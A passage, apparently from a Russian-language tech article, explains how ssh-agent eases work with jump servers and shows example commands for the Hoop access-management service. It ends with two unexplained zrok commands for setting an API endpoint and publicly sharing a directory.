Работу с джамп-сервером облегчает ssh-agent . Это специфический клиент SSH, который хранит данные аутентификации за пределами одной сессии, способен хранить в памяти расшифрованные ключи и устанавливать соединение с SSH-клиентами через IPC-сокет (сокет межпроцессного взаимодействия. Подробнее об SSH-агентах см. здесь.

▍ Менеджмент джамп-сервера

Для управления инфраструктурой джамп-серверов созданы даже специальные (коммерческие) сервисы, такие как Hoop. В данном случае вместо управления джамп-сервером и всеми инструментами на нём мы управляем агентами, где изначально заложены необходимые инструменты и примитивы. Это замена одной плоскости менеджмента на другую (теоретически, более удобную).

Здесь реализована собственная платформа идентификации, автоматическая ротация ключей SSH, назначение ролей пользователей. Все настройки для sudoers, серверов DNS и прочего делаются автоматически через SSH-агента (hoop).

Подключение к инстансу postgres на локальном порту:

$ hoop connect postgres-prod

Проброс порта внутреннего API:

$ hoop connect my-internal-api -p 8000

Создать интерактивную консоль Rails или сессию Django:

$ hoop connect rails-console-homolog $ hoop connect django-prod

Выполнить скрипт непосредственно в приложении Rails:

$ hoop exec rails-exec-prod 

$ zrok config set apiEndpoint https://zrok.mydomain.com

$ zrok share public . --backend-mode web